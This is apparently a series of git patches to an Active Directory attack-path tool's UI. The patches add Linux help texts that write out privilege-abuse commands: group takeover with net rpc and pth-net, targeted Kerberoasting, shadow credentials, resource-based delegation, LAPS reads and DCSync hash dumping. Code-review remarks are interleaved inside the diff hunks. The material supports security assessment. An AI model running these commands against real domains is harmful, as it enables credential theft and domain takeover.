+ + ); + } + return <>; +}; + +LinuxAbuse.propTypes = { + sourceName: PropTypes.string, + sourceType: PropTypes.string, + targetName: PropTypes.string, + targetType: PropTypes.string, + targetId: PropTypes.string, + haslaps: PropTypes.bool, +}; +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/GenericAll/References.jsx b/src/components/Modals/HelpTexts/GenericAll/References.jsx index 6746e9f68..71b344393 100644 --- a/src/components/Modals/HelpTexts/GenericAll/References.jsx +++ b/src/components/Modals/HelpTexts/GenericAll/References.jsx @@ -46,6 +46,38 @@ const References = () => { https://github.com/Kevin-Robertson/Powermad#new-machineaccount +
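Review bot: The switch in the new LinuxAbuse component contains two identical `case 'OU':` branches back to back (the second begins right after the first one's `);`), and since the first match wins the second is unreachable dead code that ESLint's `no-duplicate-case` would flag — delete it. The OU and Container examples grant rights to `-principal 'JKHOLER'` while the next sentence says the "JKOHLER" user, so pick one spelling; and the Container branch still says "control of the OU" / "objects under that OU" after its heading was changed to Container. The Domain branch opens with "The AllExtendedRights privilege grants {sourceName} …", lifted from the AllExtendedRights help text; for this edge it should read "Full control of the domain grants {sourceName} …" so the explanation matches GenericAll. Smaller text slips: "Takeoever" → "Takeover" in three headings, and the trailing `` ` `` before the `;` at the end of the GPO paragraph renders literally in JSX. The Computer branch also repeats the whole RBCD and Shadow Credentials text in both arms of `if (haslaps)`; hoisting that text out and guarding only the LAPS section would halve the branch and keep the two copies from drifting apart.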
+ + https://www.thehacker.recipes/ad/movement/dacl/addmember + +
+ + https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting + +
+ + https://www.thehacker.recipes/ad/movement/group-policies + +
+ + https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword + +
+ + https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials + +
+ + https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync + +
+ + https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd + +
+ + https://www.thehacker.recipes/ad/movement/dacl/grant-rights + ); }; diff --git a/src/components/Modals/HelpTexts/GenericAll/Abuse.jsx b/src/components/Modals/HelpTexts/GenericAll/WindowsAbuse.jsx similarity index 99% rename from src/components/Modals/HelpTexts/GenericAll/Abuse.jsx rename to src/components/Modals/HelpTexts/GenericAll/WindowsAbuse.jsx index 8eb15396d..b6f463252 100644 --- a/src/components/Modals/HelpTexts/GenericAll/Abuse.jsx +++ b/src/components/Modals/HelpTexts/GenericAll/WindowsAbuse.jsx @@ -1,7 +1,7 @@ import React from 'react'; import PropTypes from 'prop-types'; -const Abuse = ({ +const WindowsAbuse = ({ sourceName, sourceType, targetName, @@ -592,7 +592,7 @@ const Abuse = ({ return <>; }; -Abuse.propTypes = { +WindowsAbuse.propTypes = { sourceName: PropTypes.string, sourceType: PropTypes.string, targetName: PropTypes.string, @@ -600,4 +600,4 @@ Abuse.propTypes = { targetId: PropTypes.string, haslaps: PropTypes.bool, }; -export default Abuse; +export default WindowsAbuse; From 23b090d8df26c2e93e0fa13441ace318561dab4d Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 17:37:27 +0100 Subject: [PATCH 14/32] Adding headers for AllExtendedRights linux abuse --- .../Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx index 18465a52c..b00ff156a 100644 --- a/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx +++ b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx @@ -80,6 +80,8 @@ const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps }) case 'Domain': return ( <> +

DCSync

+

The AllExtendedRights privilege grants {sourceName} both the DS-Replication-Get-Changes and @@ -100,6 +102,8 @@ const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps })

+

Retrieve LAPS Passwords

+

The AllExtendedRights privilege also grants {sourceName} enough{' '} privileges, to retrieve LAPS passwords domain-wise. From 34327bcb61d1d8ccbc8c5fb42059ae86cb5d3813 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 17:46:19 +0100 Subject: [PATCH 15/32] GenericWrite Linux abuse --- .../HelpTexts/GenericWrite/GenericWrite.jsx | 18 +- .../HelpTexts/GenericWrite/LinuxAbuse.jsx | 177 ++++++++++++++++++ .../{Abuse.jsx => WindowsAbuse.jsx} | 6 +- 3 files changed, 193 insertions(+), 8 deletions(-) create mode 100644 src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/GenericWrite/{Abuse.jsx => WindowsAbuse.jsx} (98%) diff --git a/src/components/Modals/HelpTexts/GenericWrite/GenericWrite.jsx b/src/components/Modals/HelpTexts/GenericWrite/GenericWrite.jsx index fb3828e80..0e8cb678b 100644 --- a/src/components/Modals/HelpTexts/GenericWrite/GenericWrite.jsx +++ b/src/components/Modals/HelpTexts/GenericWrite/GenericWrite.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -17,17 +18,24 @@ const GenericWrite = ({ sourceName, sourceType, targetName, targetType }) => { targetType={targetType} /> - - + - + + + + - + diff --git a/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx new file mode 100644 index 000000000..de7650592 --- /dev/null +++ b/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx @@ -0,0 +1,177 @@ +import React from 'react'; +import PropTypes from 'prop-types'; + +const LinuxAbuse = ({ sourceName, sourceType, targetType }) => { + switch (targetType) { + case 'Group': + return ( + <> +

+ GenericWrite to a group allows you to directly modify + group membership of the group. +

+ +

+ Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext + or prompted interactively if omitted from the command line: +

+ +
+                        
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Pass-the-hash can also be done here with pth-toolkit's net tool. + If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. +

+ +
+                        
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Finally, verify that the user was successfully added to the group: +

+ +
+                        
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ + ); + case 'User': + return ( + <> +

Targeted Kerberoast

+ +

+ A targeted kerberoast attack can be performed using{' '} + targetedKerberoast.py. +

+ +
+                        
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        
+                    
+ +

+ The tool will automatically attempt a targetedKerberoast + attack, either on all users or against a specific one if + specified in the command line, and then obtain a crackable hash. + The cleanup is done automatically as well. +

+ +

+ The recovered hash can be cracked offline using the tool + of your choice. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                        {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                    
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + case 'Computer': + return ( + <> +

Resource-Based Constrained Delegation

+ +

+ First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script: +

+ +
+                        
+                            {
+                                "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                            }
+                        
+                    
+ +

+ We can then get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose. +

+ +
+                        
+                            {
+                                "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                            }
+                        
+                    
+ +

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                        {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                    
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + case 'GPO': + return ( + <> +

+ With GenericWrite over a GPO, you may make modifications + to that GPO which will then apply to the users and + computers affected by the GPO. Select the target object + you wish to push an evil policy down to, then use the + gpedit GUI to modify the GPO, using an evil policy that + allows item-level targeting, such as a new immediate + scheduled task. Then wait at least 2 hours for the group + policy client to pick up and execute the new evil + policy. See the references tab for a more detailed write + up on this abuse`; +

+ +

+ pyGPOAbuse.py can be used for that purpose. +

+ + ); + } +}; + +LinuxAbuse.propTypes = { + sourceName: PropTypes.string, + sourceType: PropTypes.string, + targetType: PropTypes.string, +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/GenericWrite/Abuse.jsx b/src/components/Modals/HelpTexts/GenericWrite/WindowsAbuse.jsx similarity index 98% rename from src/components/Modals/HelpTexts/GenericWrite/Abuse.jsx rename to src/components/Modals/HelpTexts/GenericWrite/WindowsAbuse.jsx index 5fab21f58..aa45155d5 100644 --- a/src/components/Modals/HelpTexts/GenericWrite/Abuse.jsx +++ b/src/components/Modals/HelpTexts/GenericWrite/WindowsAbuse.jsx @@ -1,7 +1,7 @@ import React from 'react'; import PropTypes from 'prop-types'; -const Abuse = ({ sourceName, sourceType, targetType }) => { +const WindowsAbuse = ({ sourceName, sourceType, targetType }) => { switch (targetType) { case 'Group': return ( @@ -213,10 +213,10 @@ const Abuse = ({ sourceName, sourceType, targetType }) => { } }; -Abuse.propTypes = { +WindowsAbuse.propTypes = { sourceName: PropTypes.string, sourceType: PropTypes.string, targetType: PropTypes.string, }; -export default Abuse; +export default WindowsAbuse; From 91e2186d34d6ca7f346bd67fbe5351bc7de22cfc Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 17:48:43 +0100 Subject: [PATCH 16/32] Fixing indentation --- src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx index 07137601a..0d0855642 100644 --- a/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx +++ b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx @@ -9,11 +9,11 @@ const LinuxAbuse = () => {
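Review bot: The GPO case's closing paragraph ends with a stray "`;" (`up on this abuse`;`) that is rendered to the user; it looks like a leftover from converting a template literal and should be dropped, and the same fragment appears in the Owns/LinuxAbuse.jsx hunk of PATCH 21. The `switch (targetType)` has no `default`, so an unexpected targetType makes the component return `undefined`, which depending on the React version in use is reported as "Nothing was returned from render"; add `default: return null;` (WindowsAbuse.jsx's switch should be checked for the same). `sourceName` and `sourceType` are destructured and declared in propTypes but never read in this component. In the Group case, "it must be replace with" should read "it must be replaced with".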

-                    
-                        {
-                            "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
-                        }
-                    
+                
+                    {
+                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                    }
+                
             

From 59c534c10e893516fa28edfa24255efb2c5baf27 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 17:48:55 +0100 Subject: [PATCH 17/32] GetChanges Linux abuse --- .../HelpTexts/GetChanges/GetChanges.jsx | 14 ++++++---- .../HelpTexts/GetChanges/LinuxAbuse.jsx | 28 +++++++++++++++++++ .../{Abuse.jsx => WindowsAbuse.jsx} | 4 +-- 3 files changed, 39 insertions(+), 7 deletions(-) create mode 100644 src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/GetChanges/{Abuse.jsx => WindowsAbuse.jsx} (92%) diff --git a/src/components/Modals/HelpTexts/GetChanges/GetChanges.jsx b/src/components/Modals/HelpTexts/GetChanges/GetChanges.jsx index 49a55067e..1571e0bbb 100644 --- a/src/components/Modals/HelpTexts/GetChanges/GetChanges.jsx +++ b/src/components/Modals/HelpTexts/GetChanges/GetChanges.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -16,13 +17,16 @@ const GetChanges = ({ sourceName, sourceType, targetName, targetType }) => { targetName={targetName} /> - - + + - + + + + - + diff --git a/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx new file mode 100644 index 000000000..0d0855642 --- /dev/null +++ b/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx @@ -0,0 +1,28 @@ +import React from 'react'; + +const LinuxAbuse = () => { + return ( + <> +

+ You may perform a dcsync attack to get the password hash of an + arbitrary principal using impacket's secretsdump.py example script: +

+ +
+                
+                    {
+                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                    }
+                
+            
+ +

+ You can also perform the more complicated ExtraSids attack to + hop domain trusts. For information on this see the blog post by + harmj0y in the references tab. +

+ + ); +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/GetChanges/Abuse.jsx b/src/components/Modals/HelpTexts/GetChanges/WindowsAbuse.jsx similarity index 92% rename from src/components/Modals/HelpTexts/GetChanges/Abuse.jsx rename to src/components/Modals/HelpTexts/GetChanges/WindowsAbuse.jsx index 3d2c26540..6cba4a61b 100644 --- a/src/components/Modals/HelpTexts/GetChanges/Abuse.jsx +++ b/src/components/Modals/HelpTexts/GetChanges/WindowsAbuse.jsx @@ -1,6 +1,6 @@ import React from 'react'; -const Abuse = () => { +const WindowsAbuse = () => { return ( <>
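Review bot: This new file has the same blob id (0d0855642) as GetChangesAll/LinuxAbuse.jsx added in PATCH 18 and as DCSync/LinuxAbuse.jsx after the indentation fix in PATCH 16, i.e. three byte-identical components; one shared component (or re-exporting the DCSync one) would keep a later correction to the command or wording from having to be made three times. The prose refers to `secretsdump.py` while the code block invokes `secretsdump` without the extension; pick one so the text matches the command shown. Both points apply equally to the GetChangesAll hunk.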

@@ -24,4 +24,4 @@ const Abuse = () => { ); }; -export default Abuse; +export default WindowsAbuse; From 361b4eb63b8ccd921fe7c6a85367b1ec6b1b74d7 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 17:54:37 +0100 Subject: [PATCH 18/32] GetChangesAll Linux abuse --- .../HelpTexts/GetChangesAll/GetChangesAll.jsx | 14 ++++++---- .../HelpTexts/GetChangesAll/LinuxAbuse.jsx | 28 +++++++++++++++++++ .../{Abuse.jsx => WindowsAbuse.jsx} | 6 ++-- 3 files changed, 40 insertions(+), 8 deletions(-) create mode 100644 src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/GetChangesAll/{Abuse.jsx => WindowsAbuse.jsx} (91%) diff --git a/src/components/Modals/HelpTexts/GetChangesAll/GetChangesAll.jsx b/src/components/Modals/HelpTexts/GetChangesAll/GetChangesAll.jsx index 7db38ad6e..f280de03e 100644 --- a/src/components/Modals/HelpTexts/GetChangesAll/GetChangesAll.jsx +++ b/src/components/Modals/HelpTexts/GetChangesAll/GetChangesAll.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -16,13 +17,16 @@ const GetChangesAll = ({ sourceName, sourceType, targetName, targetType }) => { targetName={targetName} /> - - + + - + + + + - + diff --git a/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx new file mode 100644 index 000000000..0d0855642 --- /dev/null +++ b/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx @@ -0,0 +1,28 @@ +import React from 'react'; + +const LinuxAbuse = () => { + return ( + <> +

+ You may perform a dcsync attack to get the password hash of an + arbitrary principal using impacket's secretsdump.py example script: +

+ +
+                
+                    {
+                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                    }
+                
+            
+ +

+ You can also perform the more complicated ExtraSids attack to + hop domain trusts. For information on this see the blog post by + harmj0y in the references tab. +

+ + ); +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/GetChangesAll/Abuse.jsx b/src/components/Modals/HelpTexts/GetChangesAll/WindowsAbuse.jsx similarity index 91% rename from src/components/Modals/HelpTexts/GetChangesAll/Abuse.jsx rename to src/components/Modals/HelpTexts/GetChangesAll/WindowsAbuse.jsx index c00eda93f..6cba4a61b 100644 --- a/src/components/Modals/HelpTexts/GetChangesAll/Abuse.jsx +++ b/src/components/Modals/HelpTexts/GetChangesAll/WindowsAbuse.jsx @@ -1,6 +1,6 @@ import React from 'react'; -const Abuse = () => { +const WindowsAbuse = () => { return ( <>

@@ -17,11 +17,11 @@ const Abuse = () => {

You can also perform the more complicated ExtraSids attack to - hop domain trusts. For information on this see the blod post by + hop domain trusts. For information on this see the blog post by harmj0y in the references tab.

); }; -export default Abuse; +export default WindowsAbuse; From 21dd4b9d78c2eddcffe228726804c1abd9542034 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 18:12:52 +0100 Subject: [PATCH 19/32] Forgot a few references --- src/components/Modals/HelpTexts/GetChanges/References.jsx | 4 ++++ src/components/Modals/HelpTexts/GetChangesAll/References.jsx | 4 ++++ 2 files changed, 8 insertions(+) diff --git a/src/components/Modals/HelpTexts/GetChanges/References.jsx b/src/components/Modals/HelpTexts/GetChanges/References.jsx index c9efb1890..ee2a95b3a 100644 --- a/src/components/Modals/HelpTexts/GetChanges/References.jsx +++ b/src/components/Modals/HelpTexts/GetChanges/References.jsx @@ -10,6 +10,10 @@ const References = () => { https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/ +
+ + https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync + ); }; diff --git a/src/components/Modals/HelpTexts/GetChangesAll/References.jsx b/src/components/Modals/HelpTexts/GetChangesAll/References.jsx index c9efb1890..ee2a95b3a 100644 --- a/src/components/Modals/HelpTexts/GetChangesAll/References.jsx +++ b/src/components/Modals/HelpTexts/GetChangesAll/References.jsx @@ -10,6 +10,10 @@ const References = () => { https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/ +
+ + https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync + ); }; From df384f389a6f2c3a3faa736eb6b7573c613d6351 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 18:13:20 +0100 Subject: [PATCH 20/32] Redundant case --- .../HelpTexts/GenericAll/LinuxAbuse.jsx | 44 ------------------- 1 file changed, 44 deletions(-) diff --git a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx index 49258b644..7b16993c5 100644 --- a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx +++ b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx @@ -378,50 +378,6 @@ const LinuxAbuse = ({

Targeted Descendent Object Takeoever

-

- If you want to be more targeted with your approach, it - is possible to specify precisely what right you want to - apply to precisely which kinds of descendent objects. - Refer to the Windows Abuse info for this. -

- - ); - case 'OU': - return ( - <> -

Control of the Organization Unit

- -

- With full control of the OU, you may add a new ACE on - the OU that will inherit down to the objects under that - OU. Below are two options depending on how targeted you - choose to be in this step: -

- -

Generic Descendent Object Takeover

-

- The simplest and most straight forward way to abuse - control of the OU is to apply a GenericAll ACE on the OU - that will inherit down to all object types. This - can be done using Impacket's dacledit (cf. "grant rights" - reference for the link). -

- -
-                        
-                            {
-                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
-                            }
-                        
-                    
- -

- Now, the "JKOHLER" user will have full control of all - descendent objects of each type. -

- -

Targeted Descendent Object Takeoever

-

If you want to be more targeted with your approach, it is possible to specify precisely what right you want to From 208d42cd3f6e3cb0e12d7611ddb72b136d495150 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 18:13:31 +0100 Subject: [PATCH 21/32] Owns Linux abuse --- .../Modals/HelpTexts/Owns/LinuxAbuse.jsx | 583 ++++++++++++++++++ src/components/Modals/HelpTexts/Owns/Owns.jsx | 20 +- .../Modals/HelpTexts/Owns/References.jsx | 8 + .../Owns/{Abuse.jsx => WindowsAbuse.jsx} | 6 +- 4 files changed, 609 insertions(+), 8 deletions(-) create mode 100644 src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/Owns/{Abuse.jsx => WindowsAbuse.jsx} (99%) diff --git a/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx new file mode 100644 index 000000000..31e275352 --- /dev/null +++ b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx @@ -0,0 +1,583 @@ +import React from 'react'; +import PropTypes from 'prop-types'; + +const LinuxAbuse = ({ + sourceName, + sourceType, + targetName, + targetType, + targetId, + haslaps, +}) => { + switch (targetType) { + case 'Group': + return ( + <> +

Modifying the rights

+ +

+ To abuse ownership of a group object, you may grant + yourself the AddMember privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ +

Adding to the group

+ +

+ You can now add members to the group. +

+ +

+ Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext + or prompted interactively if omitted from the command line: +

+ +
+                        
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Pass-the-hash can also be done here with pth-toolkit's net tool. + If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. +

+ +
+                        
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Finally, verify that the user was successfully added to the group: +

+ +
+                        
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ +

Cleanup

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'remove' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ + ); + + case 'User': + return ( + <> +

+ To abuse ownership of a user object, you may grant + yourself the GenericAll privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

Targeted Kerberoast

+ +

+ A targeted kerberoast attack can be performed using{' '} + targetedKerberoast.py. +

+ +
+                        
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        
+                    
+ +

+ The tool will automatically attempt a targetedKerberoast + attack, either on all users or against a specific one if + specified in the command line, and then obtain a crackable hash. + The cleanup is done automatically as well. +

+ +

+ The recovered hash can be cracked offline using the tool + of your choice. +

+ +

Force Change Password

+ +

+ Use samba's net tool to change the user's password. The credentials can be supplied in cleartext + or prompted interactively if omitted from the command line. The new password will be prompted + if omitted from the command line. +

+ +
+                        
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Pass-the-hash can also be done here with pth-toolkit's net tool. + If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. +

+ +
+                        
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        
+                    
+

+ Now that you know the target user's plain text password, you can + either start a new agent as that user, or use that user's + credentials in conjunction with PowerView's ACL abuse functions, + or perhaps even RDP to a system the target user has access to. + For more ideas and information, see the references tab. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                        {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                    
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + case 'Computer': + if (haslaps) { + return ( + <> +

+ To abuse ownership of a computer object, you may + grant yourself the GenericAll privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                            
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            
+                        
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

Retrieve LAPS Password

+ +

+ Full control of a computer object is abusable when + the computer's local admin account credential is + controlled with LAPS. The clear-text password for + the local administrator account is stored in an + extended attribute on the computer object called + ms-Mcs-AdmPwd. With full control of the computer + object, you may have the ability to read this + attribute, or grant yourself the ability to read the + attribute by modifying the computer object's + security descriptor. +

+ +

+ LAPSDumper can be used + to retrieve LAPS passwords: +

+ +
+                            
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            
+                        
+ +

Resource-Based Constrained Delegation

+ +

+ First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script: +

+ +
+                            
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            
+                        
+ +

+ We can then get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose. +

+ +
+                            
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            
+                        
+ +

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                            {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                        
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + } else { + return ( + <> +

+ To abuse ownership of a computer object, you may + grant yourself the GenericAll privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                            
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            
+                        
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

Resource-Based Constrained Delegation

+ +

+ First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script: +

+ +
+                            
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            
+                        
+ +

+ We can then get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose. +

+ +
+                            
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            
+                        
+ +

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                            {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                        
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + } + case 'Domain': + return ( + <> +

+ To abuse ownership of a domain object, you may grant + yourself the DcSync privileges. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'DCSync' -rights 'FullControl' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ +

